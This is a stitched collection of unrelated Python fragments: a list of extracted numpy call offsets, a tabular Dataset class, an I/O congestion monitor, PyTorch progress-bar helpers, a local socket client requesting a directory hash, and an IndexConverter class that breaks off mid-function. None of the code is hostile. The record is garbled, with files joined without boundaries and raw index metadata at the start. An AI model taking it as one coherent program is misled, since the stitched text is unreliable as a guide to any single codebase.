'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33040, 33057), True, 'import numpy as np\n'), ((34347, 34364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (34355, 34364), True, 'import numpy as np\n'), ((34380, 34398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (34388, 34398), True, 'import numpy as np\n'), ((34420, 34444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (34428, 34444), True, 'import numpy as np\n'), ((34470, 34498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (34478, 34498), True, 'import numpy as np\n'), ((35347, 35364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (35355, 35364), True, 'import numpy as np\n'), ((35380, 35398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (35388, 35398), True, 'import numpy as np\n'), ((35420, 35444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (35428, 35444), True, 'import numpy as np\n'), ((35470, 35498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (35478, 35498), True, 'import numpy as np\n'), ((36347, 36364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (36355, 36364), True, 'import numpy as np\n'), ((36380, 36398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (36388, 36398), True, 'import numpy as np\n'), ((36420, 36444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (36428, 36444), True, 'import numpy as np\n'), ((36470, 36498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (36478, 36498), True, 'import numpy as np\n'), ((37347, 37364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (37355, 37364), True, 'import numpy as np\n'), ((37380, 37398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (37388, 37398), True, 'import numpy as np\n'), ((37420, 37444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (37428, 37444), True, 'import numpy as np\n'), ((37470, 37498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (37478, 37498), True, 'import numpy as np\n'), ((38347, 38364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (38355, 38364), True, 'import numpy as np\n'), ((38380, 38398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (38388, 38398), True, 'import numpy as np\n'), ((38420, 38444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (38428, 38444), True, 'import numpy as np\n'), ((38470, 38498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (38478, 38498), True, 'import numpy as np\n'), ((5641, 5660), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (5648, 5660), True, 'import numpy as np\n'), ((6090, 6129), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (6104, 6129), True, 'import numpy as np\n'), ((6130, 6152), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (6140, 6152), True, 'import numpy as np\n'), ((13731, 13750), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (13738, 13750), True, 'import numpy as np\n'), ((14180, 14219), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (14194, 14219), True, 'import numpy as np\n'), ((14220, 14242), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (14230, 14242), True, 'import numpy as np\n'), ((21821, 21840), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (21828, 21840), True, 'import numpy as np\n'), ((22270, 22309), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (22284, 22309), True, 'import numpy as np\n'), ((22310, 22332), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (22320, 22332), True, 'import numpy as np\n'), ((29911, 29930), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (29918, 29930), True, 'import numpy as np\n'), ((30360, 30399), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (30374, 30399), True, 'import numpy as np\n'), ((30400, 30422), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (30410, 30422), True, 'import numpy as np\n'), ((635, 650), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (643, 650), True, 'import numpy as np\n'), ((1064, 1089), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1072, 1089), True, 'import numpy as np\n'), ((5975, 6000), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (5983, 6000), True, 'import numpy as np\n'), ((8485, 8516), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (8495, 8516), True, 'import numpy as np\n'), ((8553, 8584), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (8563, 8584), True, 'import numpy as np\n'), ((8621, 8652), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (8631, 8652), True, 'import numpy as np\n'), ((8809, 8847), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (8819, 8847), True, 'import numpy as np\n'), ((8926, 8964), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (8936, 8964), True, 'import numpy as np\n'), ((9043, 9081), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (9053, 9081), True, 'import numpy as np\n'), ((9154, 9179), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (9162, 9179), True, 'import numpy as np\n'), ((14065, 14090), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (14073, 14090), True, 'import numpy as np\n'), ((16575, 16606), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (16585, 16606), True, 'import numpy as np\n'), ((16643, 16674), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (16653, 16674), True, 'import numpy as np\n'), ((16711, 16742), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (16721, 16742), True, 'import numpy as np\n'), ((16899, 16937), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (16909, 16937), True, 'import numpy as np\n'), ((17016, 17054), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (17026, 17054), True, 'import numpy as np\n'), ((17133, 17171), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (17143, 17171), True, 'import numpy as np\n'), ((17244, 17269), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (17252, 17269), True, 'import numpy as np\n'), ((22155, 22180), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (22163, 22180), True, 'import numpy as np\n'), ((24665, 24696), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (24675, 24696), True, 'import numpy as np\n'), ((24733, 24764), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (24743, 24764), True, 'import numpy as np\n'), ((24801, 24832), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (24811, 24832), True, 'import numpy as np\n'), ((24989, 25027), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (24999, 25027), True, 'import numpy as np\n'), ((25106, 25144), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (25116, 25144), True, 'import numpy as np\n'), ((25223, 25261), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (25233, 25261), True, 'import numpy as np\n'), ((25334, 25359), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (25342, 25359), True, 'import numpy as np\n'), ((30245, 30270), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (30253, 30270), True, 'import numpy as np\n'), ((32755, 32786), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (32765, 32786), True, 'import numpy as np\n'), ((32823, 32854), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (32833, 32854), True, 'import numpy as np\n'), ((32891, 32922), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (32901, 32922), True, 'import numpy as np\n'), ((33079, 33117), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (33089, 33117), True, 'import numpy as np\n'), ((33196, 33234), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (33206, 33234), True, 'import numpy as np\n'), ((33313, 33351), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (33323, 33351), True, 'import numpy as np\n'), ((33424, 33449), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33432, 33449), True, 'import numpy as np\n'), ((1109, 1134), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1117, 1134), True, 'import numpy as np\n'), ((9199, 9224), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (9207, 9224), True, 'import numpy as np\n'), ((17289, 17314), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (17297, 17314), True, 'import numpy as np\n'), ((25379, 25404), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (25387, 25404), True, 'import numpy as np\n'), ((33469, 33494), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33477, 33494), True, 'import numpy as np\n')] |
import pandas as pd
import numpy as np
from src.si.util.util import label_gen
__all__ = ['Dataset']
class Dataset:
def __init__(self, X=None, Y=None,
xnames: list = None,
yname: str = None):
""" Tabular Dataset"""
if X is None:
raise Exception("Trying to instanciate a DataSet without any data")
self.X = X
self.Y = Y
self.xnames = xnames if xnames else label_gen(X.shape[1])
self.yname = yname if yname else 'Y'
@classmethod
def from_data(cls, filename, sep=",", labeled=True):
"""Creates a DataSet from a data file.
:param filename: The filename
:type filename: str
:param sep: attributes separator, defaults to ","
:type sep: str, optional
:return: A DataSet object
:rtype: DataSet
"""
data = np.genfromtxt(filename, delimiter=sep)
if labeled:
X = data[:, 0:-1]
Y = data[:, -1]
else:
X = data
Y = None
return cls(X, Y)
@classmethod
def from_dataframe(cls, df, ylabel=None):
"""Creates a DataSet from a pandas dataframe.
:param df: [description]
:type df: [type]
:param ylabel: [description], defaults to None
:type ylabel: [type], optional
:return: [description]
:rtype: [type]
"""
if ylabel and ylabel in df.columns:
X = df.loc[:, df.columns != ylabel].to_numpy() #transforma num array de numpy
Y = df.loc[:, ylabel].to_numpy()
# xnames = df.columns.tolist().remove(ylabel)
yname = ylabel
xnames = df.columns.tolist()
for name in xnames:
if name == yname:
xnames.remove(yname)
else:
X = df.to_numpy()
Y = None
xnames = df.columns.tolist()
yname = None
return cls(X, Y, xnames, yname)
def __len__(self):
"""Returns the number of data points."""
return self.X.shape[0]
def hasLabel(self):
"""Returns True if the dataset constains labels (a dependent variable)"""
return self.Y is not None
def getNumFeatures(self):
"""Returns the number of features"""
return self.X.shape[1]
def getNumClasses(self):
"""Returns the number of label classes or 0 if the dataset has no dependent variable."""
return len(np.unique(self.Y)) if self.hasLabel() else 0
def writeDataset(self, filename, sep=","):
"""Saves the dataset to a file
:param filename: The output file path
:type filename: str
:param sep: The fields separator, defaults to ","
:type sep: str, optional
"""
fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1)))
np.savetxt(filename, fullds, delimiter=sep)
def toDataframe(self):
""" Converts the dataset into a pandas DataFrame"""
if self.hasLabel():
df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))), columns=self.xnames[:]+[self.yname]) #columns=np.hstack((self.xnames, self.yname)))
else:
df = pd.DataFrame(self.X.copy(), columns=self.xnames[:])
return df
def getXy(self):
return self.X, self.Y
def summary(dataset, format='df'):
""" Returns the statistics of a dataset(mean, std, max, min)
:param dataset: A Dataset object
:type dataset: si.data.Dataset
:param format: Output format ('df':DataFrame, 'dict':dictionary ), defaults to 'df'
:type format: str, optional
"""
if format not in ["df", "dict"]:
raise Exception("Invalid format. Choose between 'df' and 'dict'.")
if dataset.hasLabel():
data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1)))
#data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))])
columns = dataset.xnames[:] + [dataset.yname]
else:
data = dataset.X
columns = dataset.xnames[:]
stats = {}
if type(dataset.Y[0]) is str:
for i in range(data.shape[1]-1): #ve colunas
_means = np.mean(data[:, i], axis=0)
_vars = np.var(data[:, i], axis=0)
_maxs = np.max(data[:, i], axis=0)
_mins = np.min(data[:, i], axis=0)
stat = {"mean": _means,
"var": _vars,
"max": _maxs,
"min": _mins
}
stats[columns[i]] = stat
else:
for i in range(data.shape[1]): # ve colunas
_means = np.mean(data[:, i], axis=0)
_vars = np.var(data[:, i], axis=0)
_maxs = np.max(data[:, i], axis=0)
_mins = np.min(data[:, i], axis=0)
stat = {"mean": _means,
"var": _vars,
"max": _maxs,
"min": _mins
}
stats[columns[i]] = stat
# _means = np.mean(data, axis=0)
# _vars = np.var(data, axis=0)
# _maxs = np.max(data, axis=0)
# _mins = np.min(data, axis=0)
# stats = {}
# for i in range(data.shape[1]):
# stat = {"mean": _means[i],
# "var": _vars[i],
# "max": _maxs[i],
# "min": _mins[i]
# }
# stats[columns[i]] = stat
if format == "dict":
return stats
else:
return pd.DataFrame(stats)
| [
"src.si.util.util.label_gen",
"numpy.mean",
"numpy.unique",
"numpy.max",
"numpy.savetxt",
"numpy.min",
"pandas.DataFrame",
"numpy.genfromtxt",
"numpy.var"
] | [((878, 916), 'numpy.genfromtxt', 'np.genfromtxt', (['filename'], {'delimiter': 'sep'}), '(filename, delimiter=sep)\n', (891, 916), True, 'import numpy as np\n'), ((2885, 2928), 'numpy.savetxt', 'np.savetxt', (['filename', 'fullds'], {'delimiter': 'sep'}), '(filename, fullds, delimiter=sep)\n', (2895, 2928), True, 'import numpy as np\n'), ((5482, 5501), 'pandas.DataFrame', 'pd.DataFrame', (['stats'], {}), '(stats)\n', (5494, 5501), True, 'import pandas as pd\n'), ((446, 467), 'src.si.util.util.label_gen', 'label_gen', (['X.shape[1]'], {}), '(X.shape[1])\n', (455, 467), False, 'from src.si.util.util import label_gen\n'), ((4202, 4229), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4209, 4229), True, 'import numpy as np\n'), ((4250, 4276), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4256, 4276), True, 'import numpy as np\n'), ((4297, 4323), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4303, 4323), True, 'import numpy as np\n'), ((4344, 4370), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4350, 4370), True, 'import numpy as np\n'), ((4652, 4679), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4659, 4679), True, 'import numpy as np\n'), ((4700, 4726), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4706, 4726), True, 'import numpy as np\n'), ((4747, 4773), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4753, 4773), True, 'import numpy as np\n'), ((4794, 4820), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4800, 4820), True, 'import numpy as np\n'), ((2497, 2514), 'numpy.unique', 'np.unique', (['self.Y'], {}), '(self.Y)\n', (2506, 2514), True, 'import numpy as np\n')] |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import logging
import os
from io_monitor.constants import DOMAIN
from io_monitor.utils.data_window import DataCollectionWindow
LOG = logging.getLogger(DOMAIN)
class DeviceDataCollector(object):
# Moving average windows
MA_WINDOW_SMA = 0
MA_WINDOW_MED = 1
MA_WINDOW_LAR = 2
# Device status
STATUS_NORMAL = "N"
STATUS_BUILDING = "B"
STATUS_CONGESTED = "L"
# Data tracked
DATA_IOPS = "iops"
DATA_AWAIT = "await"
def __init__(self, device_node, data_elements,
size_sma, size_med, size_lar):
self.node = device_node
if os.path.exists('/sys/block/' + self.node + '/dm/name'):
self.name = open('/sys/block/' + self.node + '/dm/name',
'r').read().rstrip()
else:
self.name = self.node
self.data_dict = {}
self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1}
self.timestamp = None
self.congestion_status = self.STATUS_NORMAL
self.congestion_await_minimal_spike = -1
self.congestion_await_sustained = -1
for element in data_elements:
self.data_dict.update({element: [
DataCollectionWindow(size_sma, stuck_data_override=True),
DataCollectionWindow(size_med, stuck_data_override=True),
DataCollectionWindow(size_lar, stuck_data_override=True)]})
def update_congestion_status(self):
# Bail if threshold is not set
if self.congestion_await_sustained == -1:
return
ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)
ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)
ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)
# Set the congestion status based on await moving average
if self.congestion_status is self.STATUS_NORMAL:
if ma_sma > self.congestion_await_sustained:
self.congestion_status = self.STATUS_BUILDING
if self.congestion_status is self.STATUS_BUILDING:
if ma_lar > self.congestion_await_sustained:
self.congestion_status = self.STATUS_CONGESTED
LOG.warn("Node %s (%s) is experiencing high await times."
% (self.node, self.name))
elif ma_sma < self.congestion_await_sustained:
self.congestion_status = self.STATUS_NORMAL
if self.congestion_status is self.STATUS_CONGESTED:
if ma_med < self.congestion_await_sustained:
self.congestion_status = self.STATUS_BUILDING
def update_data(self, ts, element, value):
self.timestamp = ts
# LOG.debug("%s: e = %s, v= %f" % (self.node, element, value))
for w in [self.MA_WINDOW_SMA,
self.MA_WINDOW_MED,
self.MA_WINDOW_LAR]:
self.data_dict[element][w].update(value, self.data_caps[element])
def get_latest(self, element):
if element not in self.data_dict:
LOG.error("Error: invalid element requested = %s" % element)
return 0
return self.data_dict[element][self.MA_WINDOW_SMA].get_latest()
def get_average(self, element, window):
if window not in [self.MA_WINDOW_SMA,
self.MA_WINDOW_MED,
self.MA_WINDOW_LAR]:
LOG.error("WindowError: invalid window requested = %s" % window)
return 0
if element not in self.data_dict:
LOG.error("Error: invalid element requested = %s" % element)
return 0
return self.data_dict[element][window].get_average()
def is_data_stale(self, ts):
return not (ts == self.timestamp)
def get_congestion_status(self, debug=False):
if debug:
ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)
ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)
ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)
LOG.debug("%s [ %6.2f %6.2f %6.2f ] %d" %
(self.node, ma_sma, ma_med, ma_lar,
self.congestion_await_sustained))
return self.congestion_status
def set_data_caps(self, element, cap):
if element in self.data_caps:
self.data_caps[element] = cap
def set_congestion_thresholds(self, await_minimal_spike,
await_sustained_congestion):
self.congestion_await_minimal_spike = await_minimal_spike
self.congestion_await_sustained = await_sustained_congestion
def get_element_windows_avg_list(self, element):
return [self.get_average(element, self.MA_WINDOW_SMA),
self.get_average(element, self.MA_WINDOW_MED),
self.get_average(element, self.MA_WINDOW_LAR)]
def get_element_windows_avg_string(self, element):
return "%s [ %9.2f, %9.2f, %9.2f ]" % (
element,
self.get_average(element, self.MA_WINDOW_SMA),
self.get_average(element, self.MA_WINDOW_MED),
self.get_average(element, self.MA_WINDOW_LAR))
| [
"logging.getLogger",
"os.path.exists",
"io_monitor.utils.data_window.DataCollectionWindow"
] | [((270, 295), 'logging.getLogger', 'logging.getLogger', (['DOMAIN'], {}), '(DOMAIN)\n', (287, 295), False, 'import logging\n'), ((739, 793), 'os.path.exists', 'os.path.exists', (["('/sys/block/' + self.node + '/dm/name')"], {}), "('/sys/block/' + self.node + '/dm/name')\n", (753, 793), False, 'import os\n'), ((1336, 1392), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_sma'], {'stuck_data_override': '(True)'}), '(size_sma, stuck_data_override=True)\n', (1356, 1392), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((1410, 1466), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_med'], {'stuck_data_override': '(True)'}), '(size_med, stuck_data_override=True)\n', (1430, 1466), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((1484, 1540), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_lar'], {'stuck_data_override': '(True)'}), '(size_lar, stuck_data_override=True)\n', (1504, 1540), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n')] |
from net_common import *
import struct
import sys
def getDirHashOpts(withNames=False,
ignoreThumbsFiles=True,
ignoreUnixHiddenFiles=True,
ignoreEmptyDirs=True):
return bytearray([((1 if withNames else 0) +
(2 if ignoreThumbsFiles else 0) +
(4 if ignoreUnixHiddenFiles else 0) +
(8 if ignoreEmptyDirs else 0))])
if __name__ == "__main__":
sock = get_connected_local_socket()
path = encodeString('/dev/shm/exampleDir')
# path = encodeString('/dev/null')
sock.sendall(bytearray(b'\x0A')) # HASH request
# sock.sendall(bytearray(b'\x01')) # choose MD5 algorithm
sock.sendall(bytearray(b'\x06')) # choose SHA3-224 algorithm
sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files)
sock.sendall(struct.pack("@H", len(path))) # len of path as unsigned short
sock.sendall(path)
resp = sock.recv(1) # response first byte: \x00 OK or \xFF ERROR
if resp != b'\x00':
print("Error byte received, errno is:", struct.unpack("@i", sock.recv(4))[0])
sys.exit(0)
# print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size
print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size
sock.close()
| [
"sys.exit"
] | [((1201, 1212), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1209, 1212), False, 'import sys\n')] |
'''Some helper functions for PyTorch, including:
- progress_bar: progress bar mimic xlua.progress.
- set_lr : set the learning rate
- clip_gradient : clip gradient
'''
import os
import sys
import time
import math
import torch
import torch.nn as nn
import torch.nn.init as init
from torch.autograd import Function
#获取控制台行、列数
if sys.platform == 'win32':
term_width = 80
else:
print('###', os.popen('stty size', 'r').read())
_, term_width = os.popen('stty size', 'r').read().split()
term_width = int(term_width)
TOTAL_BAR_LENGTH = 30.
last_time = time.time()
begin_time = last_time
#[==>........ 19/225 ...........] | Loss: 1.961 | Acc: 22.000% (537/2432)
def progress_bar(current, total, msg=None):
global last_time, begin_time
if current == 0:
begin_time = time.time() # Reset for new bar.
cur_len = int(TOTAL_BAR_LENGTH*current/total)
rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1
sys.stdout.write(' [')
for i in range(cur_len):
sys.stdout.write('=')
sys.stdout.write('>')
for i in range(rest_len):
sys.stdout.write('.')
sys.stdout.write(']')
cur_time = time.time()
step_time = cur_time - last_time
last_time = cur_time
tot_time = cur_time - begin_time
L = []
if msg:
L.append(' | ' + msg)
msg = ''.join(L)
sys.stdout.write(msg)
for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):
sys.stdout.write(' ')
# Go back to the center of the bar.
for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):
sys.stdout.write('\b')
sys.stdout.write(' %d/%d ' % (current+1, total))
if current < total-1:
sys.stdout.write('\r')
else:
sys.stdout.write('\n')
sys.stdout.flush()
def set_lr(optimizer, lr):
for group in optimizer.param_groups:
group['lr'] = lr
def clip_gradient(optimizer, grad_clip):
for group in optimizer.param_groups:
#print(group['params'])
for param in group['params']:
param.grad.data.clamp_(-grad_clip, grad_clip)
| [
"sys.stdout.flush",
"os.popen",
"time.time",
"sys.stdout.write"
] | [((587, 598), 'time.time', 'time.time', ([], {}), '()\n', (596, 598), False, 'import time\n'), ((971, 993), 'sys.stdout.write', 'sys.stdout.write', (['""" ["""'], {}), "(' [')\n", (987, 993), False, 'import sys\n'), ((1060, 1081), 'sys.stdout.write', 'sys.stdout.write', (['""">"""'], {}), "('>')\n", (1076, 1081), False, 'import sys\n'), ((1149, 1170), 'sys.stdout.write', 'sys.stdout.write', (['"""]"""'], {}), "(']')\n", (1165, 1170), False, 'import sys\n'), ((1189, 1200), 'time.time', 'time.time', ([], {}), '()\n', (1198, 1200), False, 'import time\n'), ((1390, 1411), 'sys.stdout.write', 'sys.stdout.write', (['msg'], {}), '(msg)\n', (1406, 1411), False, 'import sys\n'), ((1648, 1698), 'sys.stdout.write', 'sys.stdout.write', (["(' %d/%d ' % (current + 1, total))"], {}), "(' %d/%d ' % (current + 1, total))\n", (1664, 1698), False, 'import sys\n'), ((1806, 1824), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1822, 1824), False, 'import sys\n'), ((825, 836), 'time.time', 'time.time', ([], {}), '()\n', (834, 836), False, 'import time\n'), ((1033, 1054), 'sys.stdout.write', 'sys.stdout.write', (['"""="""'], {}), "('=')\n", (1049, 1054), False, 'import sys\n'), ((1122, 1143), 'sys.stdout.write', 'sys.stdout.write', (['"""."""'], {}), "('.')\n", (1138, 1143), False, 'import sys\n'), ((1487, 1508), 'sys.stdout.write', 'sys.stdout.write', (['""" """'], {}), "(' ')\n", (1503, 1508), False, 'import sys\n'), ((1620, 1644), 'sys.stdout.write', 'sys.stdout.write', (['"""\x08"""'], {}), "('\\x08')\n", (1636, 1644), False, 'import sys\n'), ((1735, 1757), 'sys.stdout.write', 'sys.stdout.write', (["'\\r'"], {}), "('\\r')\n", (1751, 1757), False, 'import sys\n'), ((1778, 1800), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (1794, 1800), False, 'import sys\n'), ((422, 448), 'os.popen', 'os.popen', (['"""stty size"""', '"""r"""'], {}), "('stty size', 'r')\n", (430, 448), False, 'import os\n'), ((475, 501), 'os.popen', 'os.popen', (['"""stty size"""', '"""r"""'], {}), "('stty size', 'r')\n", (483, 501), False, 'import os\n')] |
from __future__ import absolute_import, division, print_function
import logging
import sys
logging.basicConfig(
stream=sys.stdout,
level=logging.DEBUG,
format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
import numpy as np
import utils
logger = logging.getLogger("indexconverter")
class IndexConverter(object):
def __init__(self, ndim, ngrid):
self.ndim = ndim
self.ngrid = ngrid
self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)]
self._zerodim = np.zeros((self.ndim,))
self.nbins = int(np.rint((ngrid - 1) ** ndim))
def convert_to_vector(self, grid):
if grid.shape[0] != self.ngrid - 1:
raise Exception("Wrong dimension of grid. Expect length fo %s got %s" % (self.ngrid - 1, grid.shape[0]))
vector = np.empty((self.nbins,))
for bin_idx in range(self.nbins):
vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))]
return vector
def convert_to_grid(self, vector):
grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1))
if len(vector.shape) > 1:
grids = np.empty((len(vector),) + grid_shape)
for idx, v in enumerate(vector):
grids[idx] = self.convert_to_grid(v)
return grids
else:
grid = np.zeros(grid_shape)
for idx in range(len(vector)):
grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx]
return grid
def convert_to_grid_idx(self, bin_idx):
if bin_idx >= self.nbins or bin_idx < 0:
